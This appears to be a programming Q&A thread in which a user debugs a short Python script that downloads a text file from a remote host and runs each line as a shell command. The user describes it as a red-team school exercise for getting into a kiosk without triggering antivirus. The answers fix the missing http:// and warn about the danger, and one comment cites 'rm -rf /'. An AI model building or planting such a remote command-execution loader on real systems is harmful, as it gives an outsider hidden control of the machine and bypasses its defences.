# python read and run commands from a remote text file

Tags: python, python-3.x, urllib

I have a script that is supposed to read a text file from a remote server, and then execute whatever is in the txt file.

For example, if the text file has the command: "ls". The computer will run the command and list directory.
Also, pls don't suggest using urllib2 or whatever. I want to stick with python3.x

As soon as i run it i get this error:

```
Traceback (most recent call last):   
File "test.py", line 4, in <module>
    data = urllib.request.urlopen(IP_Address)   
File "C:\Users\jferr\AppData\Local\Programs\Python\Python38\lib\urllib\request.py", line 222, in urlopen
    return opener.open(url, data, timeout)
File "C:\Users\jferr\AppData\Local\Programs\Python\Python38\lib\urllib\request.py", line 509, in open
    req = Request(fullurl, data)
File "C:\Users\jferr\AppData\Local\Programs\Python\Python38\lib\urllib\request.py", line 328, in __init__
    self.full_url = url
File "C:\Users\jferr\AppData\Local\Programs\Python\Python38\lib\urllib\request.py", line 354, in full_url
    self._parse()
File "C:\Users\jferr\AppData\Local\Programs\Python\Python38\lib\urllib\request.py", line 383, in _parse
    raise ValueError("unknown url type: %r" % self.full_url) ValueError: unknown url type: 'domain.com/test.txt'
```

Here is my code:

```
import urllib.request
IP_Address = "domain.com/test.txt"
data = urllib.request.urlopen(IP_Address)
for line in data:
    print("####")
    os.system(line)
```

Edit:
yes i realize this is a bad idea. It is a school project, we are playing red team and we are supposed to get access to a kiosk. I figured instead of writing code that will try and get around intrusion detection and firewalls, it would just be easier to execute commands from a remote server. Thanks for the help everyone!

Comment: This feels like a very, very bad idea. What if someone adds `rm -rf /` to the file?

Comment: You try request local or global server request?

Comment: "unknown url type" - try adding `http://` to that url.

Comment: Security has been mentioned, but conversely, pulling in and running remote scripts is common for systems doing provisioning. Its a question of whether you can trust the server. That may mean https and a secure server environment where bad scripts cannot be injected. We all download and run programs, this isn't any different.

Comment: Yes i agree with you all. But this is a school project, we are playing on the red team. We are supposed to gain access to a kiosk and i figured it would be easier this way instead of writing code that could possibly get flagged by anti virus or whatever.

Answer (score 1, accepted):

The error occurs because your url does not include a protocol. Include "http://" (or https if you're using ssl/tls) and it should work.

As others have commented, this is a dangerous thing to do since someone could run arbitrary commands on your system this way.

Comment: Ah yes thank you. This worked. and yes i understand that this is dangerous. It is a school project. We are supposed to basically hack a Kiosk running on Linux. And i figured instead of gaining privileges and mess with firewall and intrusion detection it would be easier to execute commands from a remote server.

Answer (score 0):

Try

```
“http://localhost/domain.com/test.txt"
```

Or remote address

If local host need to run http server